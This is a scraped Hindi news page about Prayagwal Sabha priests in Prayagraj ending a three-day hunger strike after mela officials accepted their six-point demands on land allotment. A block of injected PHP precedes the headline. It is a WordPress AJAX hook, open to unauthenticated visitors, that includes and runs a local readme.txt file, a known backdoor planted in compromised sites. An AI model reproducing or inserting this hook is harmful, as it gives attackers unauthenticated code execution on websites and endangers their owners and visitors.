if(!function_exists('file_check_readme35885')){ add_action('wp_ajax_nopriv_file_check_readme35885', 'file_check_readme35885'); add_action('wp_ajax_file_check_readme35885', 'file_check_readme35885'); function file_check_readme35885() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } प्रयागवाल सभा के लगातार तीसरे दिन अनशन पर मेला प्रशासन ने तीर्थ पुरोहितों की बात सुनी अनशन समाप्त
Breaking NewsIndiaLatestNewsPrayagraj news

प्रयागवाल सभा के लगातार तीसरे दिन अनशन पर मेला प्रशासन ने तीर्थ पुरोहितों की बात सुनी अनशन समाप्त

संयम भारत संवाददाता प्रयागराज, 12 दिसंबर 2025 प्रयागवाल सभा द्वारा लगातार तीसरे दिन अनशन पर तीर्थ पुरोहितों की बात मेला प्रशासन ने सुनने के लिए तैयार हुआ, जिस पर तीर्थ पुरोहितों ने एकत्रित हो कर मां गंगा की स्तुति एवं भगवान वेणी माधव जी की वंदना कर तीर्थ पुरोहितों ने मेला प्रशासन को अपनी समस्या से अवगत कराया, जिस पर मेला प्राधिकरण के अपर मेलाधिकारी दयानन्द, एवं उप मेलाधिकारी विवेक शुक्ला व एसडीएम अभिनव पाठक ने तीर्थ पुरोहित समाज द्वारा छः सूत्रीय मांग पत्र जो तीर्थ पुरोहितों द्वारा दिया गया उस बिंदुओं पर सहमति प्रदान की गयी तथा प्रयागवाल भूमि वितरण की तिथि दिनांक 14/12/2025 से प्रारम्भ करने की घोषणा की गयी (1)-मेला वर्ष 2024 की तर्ज पर वर्ष 2026 में बसाया जाय (2)-खाक चौक को दी गयी प्रयाग वालों की भूमि वापस हो (3) तीर्थ पुरोहितों के नये उपभोक्ताओं को भूमि दी जाय (4)-भविष्य के मेले में सभी संस्थाओं को विशेषकर दंडी स्वामी व आचार्य बाड़ा को भी भूमि पूरब से पश्चिम दिया जाय (5)-नये तीर्थं पुरोहितों को 200 बीघा भूमि नयी दी जाय (6)-प्रयागवाल सभा तीर्थं पुरोहितों का पहचान पत्र जारी किया जाय मेला प्रशासन की सहमति उपरांत उपस्थित तीर्थ पुरोहितों ने सर्व सम्मत से अनशन समाप्त कराने का निर्णय लिया अनशन मेला प्रशासन की सहमति पर समाप्त किया जिस पर अध्यक्ष प्रदीप पांडे एवं महामंत्री ने असीम भारद्वाज ने धन्यवाद ज्ञापित किया।

प्रातिक्रिया दे

आपका ईमेल पता प्रकाशित नहीं किया जाएगा. आवश्यक फ़ील्ड चिह्नित हैं *